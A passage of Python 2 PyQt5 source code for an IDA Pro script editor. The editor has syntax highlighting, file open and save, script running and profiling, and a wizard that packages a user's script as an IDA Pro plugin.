421, 131)) self.textBrowser_2.setFrameShape(QtWidgets.QFrame.NoFrame) self.textBrowser_2.setObjectName("textBrowser_2") Wizard.addPage(self.wizardPage1) self.wizardPage = QtWidgets.QWizardPage() self.wizardPage.setTitle("") self.wizardPage.setSubTitle("") self.wizardPage.setObjectName("wizardPage") self.textBrowser_4 = QtWidgets.QTextBrowser(self.wizardPage) self.textBrowser_4.setGeometry(QtCore.QRect(130, 140, 499, 239)) self.textBrowser_4.setFrameShape(QtWidgets.QFrame.NoFrame) self.textBrowser_4.setObjectName("textBrowser_4") Wizard.addPage(self.wizardPage) self.tempwizardPage = QtWidgets.QWizardPage() self.tempwizardPage.setObjectName("tempwizardPage") self.verticalLayout = QtWidgets.QVBoxLayout(self.tempwizardPage) self.verticalLayout.setObjectName("verticalLayout") self.TemptextEdit = Qsci.QsciScintilla(self.tempwizardPage) self.TemptextEdit.setToolTip("") self.TemptextEdit.setWhatsThis("") self.TemptextEdit.setObjectName("TemptextEdit") self.verticalLayout.addWidget(self.TemptextEdit) self.horizontalLayout = QtWidgets.QHBoxLayout() self.horizontalLayout.setObjectName("horizontalLayout") spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout.addItem(spacerItem) self.temppushButtonopen = QtWidgets.QPushButton(self.tempwizardPage) self.temppushButtonopen.setObjectName("temppushButtonopen") self.horizontalLayout.addWidget(self.temppushButtonopen) self.temppushButtonsave = QtWidgets.QPushButton(self.tempwizardPage) self.temppushButtonsave.setObjectName("temppushButtonsave") self.horizontalLayout.addWidget(self.temppushButtonsave) self.verticalLayout.addLayout(self.horizontalLayout) Wizard.addPage(self.tempwizardPage) self.scriptwizardPage = QtWidgets.QWizardPage() self.scriptwizardPage.setObjectName("scriptwizardPage") self.textBrowser_5 = QtWidgets.QTextBrowser(self.scriptwizardPage) self.textBrowser_5.setGeometry(QtCore.QRect(120, 130, 499, 239)) self.textBrowser_5.setFrameShape(QtWidgets.QFrame.NoFrame) self.textBrowser_5.setObjectName("textBrowser_5") Wizard.addPage(self.scriptwizardPage) self.wizardPage_3 = QtWidgets.QWizardPage() self.wizardPage_3.setObjectName("wizardPage_3") self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.wizardPage_3) self.verticalLayout_2.setObjectName("verticalLayout_2") self.script_textEdit = Qsci.QsciScintilla(self.wizardPage_3) self.script_textEdit.setToolTip("") self.script_textEdit.setWhatsThis("") self.script_textEdit.setObjectName("script_textEdit") self.verticalLayout_2.addWidget(self.script_textEdit) self.horizontalLayout_2 = QtWidgets.QHBoxLayout() self.horizontalLayout_2.setObjectName("horizontalLayout_2") spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_2.addItem(spacerItem1) self.scriptGrabpushButton = QtWidgets.QPushButton(self.wizardPage_3) self.scriptGrabpushButton.setObjectName("scriptGrabpushButton") self.horizontalLayout_2.addWidget(self.scriptGrabpushButton) self.scriptpushButtonopen = QtWidgets.QPushButton(self.wizardPage_3) self.scriptpushButtonopen.setObjectName("scriptpushButtonopen") self.horizontalLayout_2.addWidget(self.scriptpushButtonopen) self.scriptpushButtonsave = QtWidgets.QPushButton(self.wizardPage_3) self.scriptpushButtonsave.setObjectName("scriptpushButtonsave") self.horizontalLayout_2.addWidget(self.scriptpushButtonsave) self.verticalLayout_2.addLayout(self.horizontalLayout_2) Wizard.addPage(self.wizardPage_3) self.wizardPage_2 = QtWidgets.QWizardPage() font = QtGui.QFont() font.setPointSize(20) self.wizardPage_2.setFont(font) self.wizardPage_2.setObjectName("wizardPage_2") self.textBrowser_6 = QtWidgets.QTextBrowser(self.wizardPage_2) self.textBrowser_6.setGeometry(QtCore.QRect(170, 140, 411, 191)) self.textBrowser_6.setFrameShape(QtWidgets.QFrame.NoFrame) self.textBrowser_6.setObjectName("textBrowser_6") Wizard.addPage(self.wizardPage_2) #font textedit self.skrift = QFont() self.skrift.setFamily('Consolas') self.skrift.setFixedPitch(True) self.skrift.setPointSize(11) self.TemptextEdit.setFont(self.skrift) self.script_textEdit.setFont(self.skrift) #python style temp self.lexer = QsciLexerPython(self.TemptextEdit) self.lexer.setFont(self.skrift) self.lexer.setEolFill(True) #Python style scritps self.lexer = QsciLexerPython(self.script_textEdit) self.lexer.setFont(self.skrift) self.lexer.setEolFill(True) self.filename = "" #python style temp self.TemptextEdit.setAutoCompletionThreshold(0) self.TemptextEdit.setAutoCompletionThreshold(6) self.TemptextEdit.setAutoCompletionThreshold(8) self.TemptextEdit.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs) # self.TemptextEdit.setDefaultFont(self.skrift) self.TemptextEdit.setLexer(self.lexer) self.TemptextEdit.SendScintilla(QsciScintilla.SCI_STYLESETFONT, 1, 'Consolas') #python style script self.script_textEdit.setAutoCompletionThreshold(0) self.script_textEdit.setAutoCompletionThreshold(6) self.script_textEdit.setAutoCompletionThreshold(8) self.script_textEdit.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs) # self.script_textEdit.setDefaultFont(self.skrift) self.script_textEdit.setLexer(self.lexer) self.script_textEdit.SendScintilla(QsciScintilla.SCI_STYLESETFONT, 1, 'Consolas') #line numbers temp fontmetrics = QFontMetrics(self.skrift) self.TemptextEdit.setMarginsFont(self.skrift) self.TemptextEdit.setMarginWidth(0, fontmetrics.width("00000") + 6) self.TemptextEdit.setTabWidth(4) #line numbers script fontmetrics = QFontMetrics(self.skrift) self.script_textEdit.setMarginsFont(self.skrift) self.script_textEdit.setMarginWidth(0, fontmetrics.width("00000") + 6) self.script_textEdit.setTabWidth(4) #brace temp self.TemptextEdit.setBraceMatching(QsciScintilla.SloppyBraceMatch) #brace script self.script_textEdit.setBraceMatching(QsciScintilla.SloppyBraceMatch) #auto line tab =4 temp self.TemptextEdit.setAutoIndent(True) #auto line tab =4 script self.TemptextEdit.setAutoIndent(True) #scroolbar self.script_textEdit.SendScintilla(QsciScintilla.SCI_SETHSCROLLBAR, 1) try: bs = open(TemplateFile).read() bba = QtCore.QByteArray(bs) self.bts = QtCore.QTextStream(bba) self.bheysa = self.bts.readAll() self.TemptextEdit.setText(self.bheysa) self.TemptextEdit.setMarkerBackgroundColor((QColor(66, 66, 255))) marker = self.TemptextEdit.markerDefine(PyQt5.Qsci.QsciScintilla.Rectangle, 2) self.TemptextEdit.markerAdd(7, 2) self.TemptextEdit.markerAdd(11, 2) self.TemptextEdit.markerAdd(12, 2) self.TemptextEdit.markerAdd(13, 2) self.TemptextEdit.markerAdd(14, 2) self.TemptextEdit.markerAdd(15, 2) self.TemptextEdit.markerAdd(19, 2) self.TemptextEdit.markerAdd(27, 2) self.TemptextEdit.markerAdd(34, 2) self.TemptextEdit.markerAdd(35, 2) self.TemptextEdit.markerAdd(40, 2) self.TemptextEdit.markerAdd(41, 2) self.TemptextEdit.markerAdd(42, 2) self.TemptextEdit.markerAdd(43, 2) self.TemptextEdit.markerAdd(44, 2) self.TemptextEdit.markerAdd(45, 2) self.TemptextEdit.markerAdd(48, 2) self.TemptextEdit.markerAdd(50, 2) self.TemptextEdit.markerAdd(51, 2) self.TemptextEdit.markerAdd(52, 2) self.TemptextEdit.markerAdd(53, 2) self.TemptextEdit.markerAdd(54, 2) self.TemptextEdit.markerAdd(55, 2) self.TemptextEdit.markerAdd(62, 2) self.TemptextEdit.markerAdd(63, 2) self.TemptextEdit.markerAdd(64, 2) self.TemptextEdit.markerAdd(67, 2) self.TemptextEdit.markerAdd(89, 2) self.TemptextEdit.markerAdd(97, 2) self.TemptextEdit.markerAdd(98, 2) self.TemptextEdit.markerAdd(99, 2) self.TemptextEdit.markerAdd(102, 2) except: self.TemptextEdit.setText('Plugin_temp file not found') pass self.retranslateUi2(Wizard) QtCore.QMetaObject.connectSlotsByName(Wizard) def retranslateUi2(self, Wizard): _translate = QtCore.QCoreApplication.translate Wizard.setWindowTitle(_translate("Wizard", " Ida Pro Plugin Wizard")) self.textBrowser_2.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n" "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n" "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:\'Calibri Light\'; font-size:20pt; font-weight:400; font-style:normal;\">\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Welcome to the plugin wizard.</p>\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Please follow the steps in the wizard, to tranform your code, to a full Ida Pro plugin.</p></body></html>")) self.textBrowser_4.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n" "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n" "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:\'Calibri Light\'; font-size:8.14286pt; font-weight:400; font-style:normal;\">\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:20pt;\">First we create the plugin loader</span></p>\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:20pt;\">Then we change the higlightet text in the template, and then save the plugin loader in Ida Pro Plugins folder.</span></p></body></html>")) self.temppushButtonopen.setText(_translate("Wizard", "Open")) self.temppushButtonsave.setText(_translate("Wizard", "Save")) self.textBrowser_5.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n" "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n" "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:\'Calibri Light\'; font-size:8.14286pt; font-weight:400; font-style:normal;\">\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:20pt;\">Now we grab the editors current script, or open a new script.<br />Remember to save this in the right folder.<br />Plugins\\My_plugin_folder as declared in the template.</span></p>\n" "<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:20pt;\"><br /></p></body></html>")) self.scriptGrabpushButton.setText(_translate("Wizard", "Grab from Editor")) self.scriptpushButtonopen.setText(_translate("Wizard", "Open")) self.scriptpushButtonsave.setText(_translate("Wizard", "Save")) self.textBrowser_6.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n" "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n" "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:\'Calibri Light\'; font-size:20pt; font-weight:400; font-style:normal;\">\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Loader Template should now be in <br />ida pro\\plugin<br />script should be in a subfolder<br />ida pro\\plugin\\Myplugin\\</p>\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">If above are correct your good to go!</p></body></html>")) self.temppushButtonopen.clicked.connect(self.opentemp) self.temppushButtonsave.clicked.connect(self.savetemp) self.scriptpushButtonopen.clicked.connect(self.openscript) self.scriptpushButtonsave.clicked.connect(self.savescript) self.scriptGrabpushButton.clicked.connect(self.grapper) def grapper(self): #hellotext = Ui_MainWindow # hello2= hellotext.sendgrapped # print str(hello2) messageformForm.show() def opentemp(self): print "hello" self.path = QtCore.QFileInfo(self.filename).path() # Get filename and show only .writer files (self.filename, _) = \ QtWidgets.QFileDialog.getOpenFileName(self.wizardPage_3, 'Open File', self.path, 'Python Files (*.py *.pyc *.pyw)', '') if self.filename: with open(self.filename, 'r') as self.file: self.TemptextEdit.setText(self.file.read()) os.chdir(str(self.path)) def savetemp(self): self.path = QtCore.QFileInfo(self.filename).path() (self.filename, _) = \ QtWidgets.QFileDialog.getSaveFileName(self, 'Save as' , self.path, 'Python Files (*.py *.pyc *.pyw)') if self.filename: self.savetexttemp(self.filename) os.chdir(str(self.path)) def savetexttemp(self, fileName): textout = self.TemptextEdit.text() file = QtCore.QFile(fileName) if file.open(QtCore.QIODevice.WriteOnly): QtCore.QTextStream(file) << textout else: QtWidgets.QMessageBox.information(self.tempwizardPage, 'Unable to open file', file.errorString()) os.chdir(str(self.path)) def openscript(self): print "hello" self.path = QtCore.QFileInfo(self.filename).path() # Get filename and show only .writer files (self.filename, _) = \ QtWidgets.QFileDialog.getOpenFileName(self.wizardPage_3, 'Open File', self.path, 'Python Files (*.py *.pyc *.pyw)', '') if self.filename: with open(self.filename, 'r') as self.file: self.script_textEdit.setText(self.file.read()) os.chdir(str(self.path)) def savescript(self): self.path = QtCore.QFileInfo(self.filename).path() (self.filename, _) = \ QtWidgets.QFileDialog.getSaveFileName(self.wizardPage_3, 'Save as' , self.path, 'Python Files (*.py *.pyc *.pyw)') if self.filename: self.savetextscript(self.filename) os.chdir(str(self.path)) def savetextscript(self, fileName): textout = self.script_textEdit.text() file = QtCore.QFile(fileName) if file.open(QtCore.QIODevice.WriteOnly): QtCore.QTextStream(file) << textout else: QtWidgets.QMessageBox.information(self.wizardPage_3, 'Unable to open file', file.errorString()) os.chdir(str(self.path)) from PyQt5 import Qsci import sys #app2 = QtWidgets.QApplication(sys.argv) class Ui_MainWindow(QtWidgets.QMainWindow): ARROW_MARKER_NUM = 8 def __init__(self, parent=None): super(Ui_MainWindow, self).__init__(parent=None) MainWindow.setObjectName(_fromUtf8("MainWindow")) MainWindow.resize(640, 480) self.vindu = QtWidgets.QWidget(MainWindow) self.vindu.setStyleSheet(_fromUtf8('notusedasyet')) #MainWindow.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint) self.vindu.setObjectName(_fromUtf8("vindu")) self.verticalLayout = PyQt5.QtWidgets.QVBoxLayout(self.vindu) icon = QtGui.QIcon() icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/ico/python.png")), QtGui.QIcon.Normal, QtGui.QIcon.On) MainWindow.setWindowIcon(icon) self.verticalLayout.setContentsMargins(0,0,0,0) self.verticalLayout.setSpacing(0) self.verticalLayout.setObjectName(_fromUtf8('verticalLayout')) self.codebox = Qsci.QsciScintilla(self.vindu) self.codebox.setToolTip(_fromUtf8("")) self.codebox.setWhatsThis(_fromUtf8("")) self.codebox.setAutoFillBackground(False) self.codebox.setFrameShape(QtWidgets.QFrame.NoFrame) self.codebox.setObjectName(_fromUtf8("codebox")) self.verticalLayout.addWidget(self.codebox) MainWindow.setCentralWidget(self.vindu) #toolbar self.toolBar = QtWidgets.QToolBar(MainWindow) self.toolBar.setAutoFillBackground(False) self.toolBar.setIconSize(QtCore.QSize(32, 32)) self.toolBar.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly) self.toolBar.setObjectName(_fromUtf8("toolBar2")) MainWindow.addToolBar(QtCore.Qt.LeftToolBarArea, self.toolBar) self.toolBar.addSeparator() #toolbar2 debugger #self.toolBar2 = QtGui.QToolBar(MainWindow) #self.toolBar2.setAutoFillBackground(False) #self.toolBar2.setIconSize(QtCore.QSize(32, 32)) #self.toolBar2.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly) #self.toolBar2.setObjectName(_fromUtf8("toolBar")) # MainWindow.addToolBar(QtCore.Qt.RightToolBarArea, self.toolBar2) # self.toolBar2.addSeparator() #getting ready for debugger self.codebox.setMarginSensitivity(1, True) self.codebox.marginClicked.connect(self.on_margin_clicked) self.codebox.markerDefine(QsciScintilla.FullRectangle, self.ARROW_MARKER_NUM) self.codebox.setMarkerBackgroundColor(QColor("#ee1111"), self.ARROW_MARKER_NUM) #first action Newfile self.toolBar.newAction = QtWidgets.QAction(QtGui.QIcon(":/ico/new.png"),"New",self.toolBar) self.toolBar.newAction.setStatusTip("Clear TextBox or make new document.") self.toolBar.newAction.setShortcut("Ctrl+N") self.toolBar.newAction.triggered.connect(self.newfile) #second Action OpenFile self.toolBar.secondAction = QtWidgets.QAction(QtGui.QIcon(":/ico/open.png"),"Open",self.toolBar) self.toolBar.secondAction.setStatusTip("Create a new document from scratch.") self.toolBar.secondAction.setShortcut("Ctrl+O") self.toolBar.secondAction.triggered.connect(self.open) # action 3 save file self.toolBar.Action3 = QtWidgets.QAction(QtGui.QIcon(":/ico/save.png"),"Save",self.toolBar) self.toolBar.Action3.setStatusTip("Save Your File.") self.toolBar.Action3.setShortcut("Ctrl+S") self.toolBar.Action3.triggered.connect(self.savefile) #action 4 run file self.toolBar.Action4 = QtWidgets.QAction(QtGui.QIcon(":/ico/run32.png"),"Run",self.toolBar) self.toolBar.Action4.setStatusTip("Run") self.toolBar.Action4.setShortcut("Ctrl+E") self.toolBar.Action4.triggered.connect(self.runto) #action 21 debug #self.toolBar2.Action21 = QtGui.QAction(QtGui.QIcon(":/ico/run32.png"),"Debug",self.toolBar) #self.toolBar2.Action21.setStatusTip("Debug File.") #self.toolBar2.Action21.setShortcut("Ctrl+7") #self.toolBar2.Action21.triggered.connect(self.debugto) #action 6 undo self.toolBar.Action6 = QtWidgets.QAction(QtGui.QIcon(":/ico/undo.png"),"Redo",self.toolBar) self.toolBar.Action6.setStatusTip("Undo.") self.toolBar.Action6.setShortcut("Ctrl+Z") self.toolBar.Action6.triggered.connect(self.codebox.undo) #action 7 redo self.toolBar.Action7 = QtWidgets.QAction(QtGui.QIcon(":/ico/redo.png"),"Redo",self.toolBar) self.toolBar.Action7.setStatusTip("Redo.") self.toolBar.Action7.setShortcut("Ctrl+Y") self.toolBar.Action7.triggered.connect(self.codebox.redo) #action8 rerset Folding self.toolBar.Action8 = QtWidgets.QAction(QtGui.QIcon(":/ico/align-justify.png"),"Reset Folding",self.toolBar) self.toolBar.Action8.setStatusTip("Reset Folding.") self.toolBar.Action8.setShortcut("Ctrl+R") self.toolBar.Action8.triggered.connect(self.nofoldingl) #actions9 CircledTreeFoldStyle self.toolBar.Action9 = QtWidgets.QAction(QtGui.QIcon(":/ico/bullet.png"),"Circled Tree Folding",self.toolBar) self.toolBar.Action9.setStatusTip("Circled Tree Folding.") self.toolBar.Action9.setShortcut("Ctrl+C") self.toolBar.Action9.triggered.connect(self.Circledfold) #actions10 plainFoldStyle self.toolBar.Action10 = QtWidgets.QAction(QtGui.QIcon(":/ico/number.png"),"Plain Folding",self.toolBar) self.toolBar.Action10.setStatusTip("Plain Folding") self.toolBar.Action10.setShortcut("Ctrl+P") self.toolBar.Action10.triggered.connect(self.plainfold) # fonts self.toolBar.Action21 = QtWidgets.QAction(QtGui.QIcon(":/ico4/font.png"), "Fonts", self.toolBar) self.toolBar.Action21.setStatusTip("Fonts") self.toolBar.Action21.setShortcut("Ctrl+F") self.toolBar.Action21.triggered.connect(self.font_choice) #web baby self.toolBar.Action11 = QtWidgets.QAction(QtGui.QIcon(":/ico/web.png"),"Hex-rays Homepage",self.toolBar) self.toolBar.Action11.setStatusTip("Home of Hex-rays") self.toolBar.Action11.setShortcut("Ctrl+W") self.toolBar.Action11.triggered.connect(self.webopen) #irc self.toolBar.Action12 = QtWidgets.QAction(QtGui.QIcon(":/ico3/settings.png"),"Open Ida Pro Python SDK",self.toolBar) self.toolBar.Action12.setStatusTip("Ida Pro Python SDK") self.toolBar.Action12.setShortcut("Ctrl+I") self.toolBar.Action12.triggered.connect(self.sdkopen) #github Python self.toolBar.Action14 = QtWidgets.QAction(QtGui.QIcon(":/ico/github.png"),"Open git python",self.toolBar) self.toolBar.Action14.setStatusTip("Open git python") self.toolBar.Action14.setShortcut("Ctrl+G") self.toolBar.Action14.triggered.connect(self.gitopen) #auther me :) self.toolBar.Action15 = QtWidgets.QAction(QtGui.QIcon(":/ico/auth.png"),"Author",self.toolBar) self.toolBar.Action15.setStatusTip("Author") self.toolBar.Action15.setShortcut("Ctrl+B") self.toolBar.Action15.triggered.connect(self.Author) #toggle off code regonision self.toolBar.Action16 = QtWidgets.QAction(QtGui.QIcon(":/ico2/pythonminus.png"),"Disable Code recognition",self.toolBar) self.toolBar.Action16.setStatusTip("Disable Code recognition") self.toolBar.Action16.setShortcut("Alt+D") self.toolBar.Action16.triggered.connect(self.Diablecode) #toogle on self.toolBar.Action17 = QtWidgets.QAction(QtGui.QIcon(":/ico2/pypluss.png"),"Enable Code recognition",self.toolBar) self.toolBar.Action17.setStatusTip("Enable Code recognition") self.toolBar.Action17.setShortcut("Alt+E") self.toolBar.Action17.triggered.connect(self.Reiablecode) # zoom in self.toolBar.Action18 = QtWidgets.QAction(QtGui.QIcon(":/ico3/in.png"),"Zoom In",self.toolBar) self.toolBar.Action18.setStatusTip("Zoom In") self.toolBar.Action18.setShortcut("CTRL+SHIFT++") self.toolBar.Action18.triggered.connect(self.udder) #zoom out self.toolBar.Action19 = QtWidgets.QAction(QtGui.QIcon(":/ico3/out.png"),"Zoom Out",self.toolBar) self.toolBar.Action19.setStatusTip("Zoom Out") self.toolBar.Action19.setShortcut("CTRL+SHIFT+-") self.toolBar.Action19.triggered.connect(self.odder) self.toolBar.Action20 = QtWidgets.QAction(QtGui.QIcon(":/ico3/10.png"),"Profile Code",self.toolBar) self.toolBar.Action20.setStatusTip("Profile Code") self.toolBar.Action20.setShortcut("CTRL+SHIFT+E") self.toolBar.Action20.triggered.connect(self.runtoprob) #PLUGINS HERE WE GO self.toolBar.Action22 = QtWidgets.QAction(QtGui.QIcon(":/ico5/plugin.png"),"Plugin",self.toolBar) self.toolBar.Action22.setStatusTip("Make plugin") self.toolBar.Action22.setShortcut("") self.toolBar.Action22.triggered.connect(self.plugin_make) self.scriptfile = self.codebox.text() self.filename = "" #actions self.toolBar.addAction(self.toolBar.newAction) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.secondAction) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action3) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action4) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action6) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action7) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action8) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action9) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action10) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action21) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action11) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action12) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action14) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action15) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action16) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action17) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action18) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action19) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action20) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action21) self.toolBar.addSeparator() self.toolBar.addAction(self.toolBar.Action22) self.skrift = QFont() self.skrift.setFamily('Consolas') self.skrift.setFixedPitch(True) self.skrift.setPointSize(12) self.codebox.setFont(self.skrift) #python style self.lexer = QsciLexerPython(self.codebox) self.lexer.setFont(self.skrift) self.lexer.setEolFill(True) #api test not working api = Qsci.QsciAPIs(self.lexer) API_FILE = dn+'\\Python.api' API_FILE2 = dn+'\\idc.api' API_FILE3 = dn+'\\idaapi.api' api.load(API_FILE) api.load(API_FILE2) api.load(API_FILE3) api.prepare() self.codebox.setAutoCompletionThreshold(0) self.codebox.setAutoCompletionThreshold(6) self.codebox.setAutoCompletionThreshold(8) self.codebox.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs) self.lexer.setDefaultFont(self.skrift) self.codebox.setLexer(self.lexer) self.codebox.SendScintilla(QsciScintilla.SCI_STYLESETFONT, 1, 'Consolas') #line numbers fontmetrics = QFontMetrics(self.skrift) self.codebox.setMarginsFont(self.skrift) self.codebox.setMarginWidth(0, fontmetrics.width("00000") + 6) self.codebox.setTabWidth(4) #brace self.codebox.setBraceMatching(QsciScintilla.SloppyBraceMatch) #auto line tab =4 self.codebox.setAutoIndent(True) #scroolbar self.codebox.SendScintilla(QsciScintilla.SCI_SETHSCROLLBAR, 1) self.retranslateUi(MainWindow) QtCore.QMetaObject.connectSlotsByName(MainWindow) def retranslateUi(self, MainWindow): MainWindow.setWindowTitle(_translate("MainWindow", "Ida Pro Python Script Editor", None)) self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar", None)) def plugin_make(self): Wizard.show() def sendgrapped(self): print "hello" helloclass = Ui_Wizard() self.bsout = self.codebox.text() helloclass.script_textEdit.setText(self.bsout) def hubba(self): print "sdfgsdgsgdghsghdg" #print str(self.codebox.text()) def udder(self): self.codebox.zoomIn() def odder(self): self.codebox.zoomOut() def newfile(self): self.codebox.clear() def open(self): self.path = QtCore.QFileInfo(self.filename).path() # Get filename and show only .writer files (self.filename, _) = \ QtWidgets.QFileDialog.getOpenFileName(self.vindu, 'Open File', self.path, 'Python Files (*.py *.pyc *.pyw)', '') if self.filename: with open(self.filename, 'r') as self.file: self.codebox.setText(self.file.read()) os.chdir(str(self.path)) def savefile(self): self.path = QtCore.QFileInfo(self.filename).path() (self.filename, _) = \ QtWidgets.QFileDialog.getSaveFileName(self.vindu, 'Save as' , self.path, 'Python Files (*.py *.pyc *.pyw)') if self.filename: self.savetext(self.filename) os.chdir(str(self.path)) def savetext(self, fileName): textout = self.codebox.text() file = QtCore.QFile(fileName) if file.open(QtCore.QIODevice.WriteOnly): QtCore.QTextStream(file) << textout else: QtWidgets.QMessageBox.information(self.vindu, 'Unable to open file', file.errorString()) os.chdir(str(self.path)) def runto(self): self.path = QtCore.QFileInfo(self.filename).path() g = globals() os.chdir(str(self.path)) script = str(self.codebox.text()) try: os.chdir(str(self.path)) os.path.join(os.path.expanduser('~'), os.path.expandvars(str(self.path))) sys.path.insert(0, str(self.path)) exec (script, g) except Exception as e: print e.__doc__ print e.message else: pass #exec (script, g) def runtoprob(self): try: self.path = QtCore.QFileInfo(self.filename).path() self.path = QtCore.QFileInfo(self.filename).path() g = globals() os.chdir(str(self.path)) script = str(self.codebox.text()) import cProfile cProfile.run(script) except Exception as e: print e.__doc__ print e.message else: import cProfile cProfile.run(script) def Diablecode(self): self.codebox.setAutoCompletionSource(Qsci.QsciScintilla.AcsNone) def Reiablecode(self): self.codebox.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs) def nofoldingl(self): self.codebox.setFolding(QsciScintilla.NoFoldStyle) def Circledfold(self): self.codebox.setFolding(QsciScintilla.CircledTreeFoldStyle) def plainfold(self): self.codebox.setFolding(QsciScintilla.PlainFoldStyle) def webopen(self): import webbrowser webbrowser.open('https://www.hex-rays.com/') def sdkopen(self): import webbrowser webbrowser.open('https://www.hex-rays.com/products/ida/support/idapython_docs/') def gitopen(self): import webbrowser webbrowser.open('https://github.com/idapython/src/tree/build-1.7.2') def Author(self): import webbrowser webbrowser.open('https://github.com/techbliss') def font_choice(self): self.lbl = self.lexer font, ok = QtWidgets.QFontDialog.getFont() if ok: self.lbl.setFont(font) def on_margin_clicked(self, nmargin, nline, modifiers): # Toggle marker for the line the margin was clicked on if self.codebox.markersAtLine(nline) != 0: self.codebox.markerDelete(nline, self.ARROW_MARKER_NUM) else: self.codebox.markerAdd(nline, self.ARROW_MARKER_NUM) class MyWindow(QtWidgets.QMainWindow): ''' we have to ask user for quiting so we can change back to root dir ''' def closeEvent(self, event): reply = QMessageBox.question(self, 'Exit', "Are you sure to quit?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No) if reply == QMessageBox.Yes: # print dn os.chdir(dn) # print dn #os.chdir('../..') # print dn print ''' ################################################### # Author Storm Shadow # # # # Follow me on twitter # # @zadow28 # ################################################### # Ida pro python Editor # ################################################### ''' event.accept() os.chdir(dn) else: event.ignore() os.chdir(dn) from PyQt5 import Qsci if __name__ == '__main__': import sys Wizard = QtWidgets.QWizard() #Wizard = QtWidgets.QWizard() #app = QtWidgets.QApplication.instance() # enable for usage outside #if not app: # enable for usage outside # app = QtWidgets.QApplication([]) # enable for usage outside MainWindow = MyWindow() ui = Ui_MainWindow() messageformForm = QtWidgets.QWidget() ui2 = Ui_Wizard() ui3 = Ui_messageformForm() ui3.setupUi1(messageformForm) MainWindow.resize(1000, 600) MainWindow.show() # app.exec_()
unlicense
-4,438,855,489,847,117,000
42.621421
338
0.644755
false
3.556545
false
false
false
dorneanu/crudappify
apps/orgapp/app/admin/views.py
1
6660
